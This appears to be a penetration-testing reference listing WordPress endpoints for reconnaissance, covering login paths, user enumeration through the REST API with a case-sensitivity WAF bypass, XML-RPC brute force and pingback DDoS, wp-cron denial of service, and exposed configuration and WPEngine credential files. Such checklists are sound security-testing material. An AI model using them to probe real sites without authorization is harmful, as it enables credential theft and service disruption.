Main Page
Default main page
/index.php
Potential Version Disclosure
Contains potential useful information such as the version of WordPress installed (In very old WordPress versions)
/license.txt
Email Service
Used for the email activation process when setting up a new WordPress site
/wp-activate.php
Login Page
Default login page for WordPress. Sometimes certain paths are blocked, so test all of them. You might be redirected to the correct login path if it's been changed.
/wp-login.php
/wp/wp-login.php
/wp-login/
/login/
/wp-admin.php
/wp-admin/
/wordpresswp-admin/wp-login.php
Hidden Admin Login
Sometimes the login page are well hidden and a simple /wp-admin/ request is insufficient to be redirected to the login page.
This is another way to be able to find where the login page may be.
Navigate to the following URL (ID parameter value might need to be adjusted):
/wp-admin/post.php?id=123
If successful you may, in some instances, be able to grep for must-log-in.
What you will see is the following string, exposing the endpoint where the admin login page is located on the application:
<p class="must-log-in">You must be <a href="https://example.com/path-to-admin-panel.php/?redirect_to=https%3A%2F%2Fexample.com%2Fen%2F404%2F">logged in</a> to post a comment.</p>
Default Administration Page
Default administration panel for WordPress - Need to be authenticated to access this page
/wp-admin.php
Developers API
An API for developers to talk with their application.
For some reason, it's active by default.
Here you may perform pingbacks with the pingback.ping method to either use it in a DDOS attack towards other applications, pingback as in receiving information such as version number of the WP site and more.
It is also possible to make the application brute force it's own users with the wp.getUsersBlogs method.
In combination with system.multicall method, multiple users may be brute forced with one request alone, leading to a potential DOS. Read more about this within XML-RPC
/xmlrpc.php
Plugin and Theme Storage
Directory where the Plugins and Themes are stored within the application. Directory Listing often seen!
/wp-content/
File Upload Storage
The directory where any files uploaded to the platform are stored. Unless there's a plugin and it's uploaded elsewhere. Directory Listing often seen!
/wp-content/uploads/
Core Files
This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets. Directory Listing often seen!
/wp-includes/
Configuration File
Contains the information such as database name, database host, usernames, passwords, authentication keys, salts and the database table prefix.
This configuration file can also be used to activate DEBUG mode, which can be useful when troubleshooting.
/wp-config.php
/wp-config.php.save
User Database
When this file is accessed, a heavy MySQL query is performed in the background, which means it could be used by attackers to perform a DoS depending on how many users are registered within the application.
/wp-cron.php
This one does not seem to be the same as wp-cron.php.
It looks like it only has some "instructions" for wp-cron.php. Nothing else can be exploited here!
/wp-includes/cron.php
Registered Users
Shows you a list of users registered on the application! Sometimes the application uses a WAF that is case sensitive. Because of the case sensitivity, the latest one would then potentially work
/wp-json/wp/v2/users
/?rest_route=/wp/v2/users
/?rest_route=/wp/v2/uSeRS
Register Page
Register page. Keep in mind that the default WordPress keeps this endpoint disabled.
If lucky, an admin might've used it at a later date and forgotten to disable it.
The parameters tend to make a difference as it, on occasion, uses JavaScript for you to access the form of registration.
/wp-register.php
/wp/wp-login.php
/wp-login.php?action=register
/wp/wp-login.php?action=register
/wp-signup.php
/wp/wp-signup.php
Default Readme File
If the meta tag has been disabled, check for the presence of /readme.html from root of the install.
Early versions of WordPress had the version right there at the top of the readme.html file.
Newer versions of WordPress have removed the version from the file.
/readme.html
Page Content via REST API
There may be an Internal Host Disclosure within this page.
Being able to find administrative pages or other parts of the application that may not be in use or are otherwise inaccessabe by normal navigation on the site. Such as pages containing contact forms or upload functionalities that may have been forgotten.
Remember to keep enumerating. Just because it might end at 300, doesn't mean there's no page with an ID of 794. These "gaps" happens when pages are deleted and new ones are created.
If page 1,2,3,4 have been removed, but page 5 exists, you will see some data leading to that endpoint.
/wp-json/wp/v2/pages
/wp-json/wp/v2/pages/<ID>
Public Comments via REST API
Navigating to one of the URLs, you will see pages that contains public comments. In the link parameter, you will see the page with the comments made from the WordPress users. author_name parameter is not the same as the actual author which is the name used to log in to the WordPress account.
/wp-json/wp/v2/comments
/wp-json/wp/v2/comments/<ID>
More Generator Locations
Generator tag exposes the WordPress version. Additionally, the feed paths tend to expose registered users or at least their nicknames. Get these verified within a user enumeration before believing they're users on the app.
/feed/
/feed/rss/
/feed/rss2/
/feed/rdf/
/feed/atom/
/wp-rdf.php
/wp-rss.php
/wp-rss2.php
/wp-atom.php
You have an additional "feed" section after the search field which may disclose users and/or WordPress version
/search/{search_here}/feed/rss2/
It may also work with the rest_route parameter in case WAF blocks stuff
wp-links-opml.php
The endpoint is used to export links from one blog post to another. This exposes the Generator meta tag as well, revealing the WordPress version. Adding the secondary payload, may expose an internal path:
/wp-links-opml.php
/wp-links-opml.php?link_cat[]
WPEngine Database Credentials
WPEngine is a provider of managed WordPress hosting. WPEngine creates a folder named _wpeprivate that contains the config.json file.
This file contains highly sensitive information such as WPEngine database credentials and should not be publicly accessible.
It was confirmed that in some instances, it's possible to access this file without authorization.
Seeing signs of WPEngine, test for this!
/_wpeprivate/config.json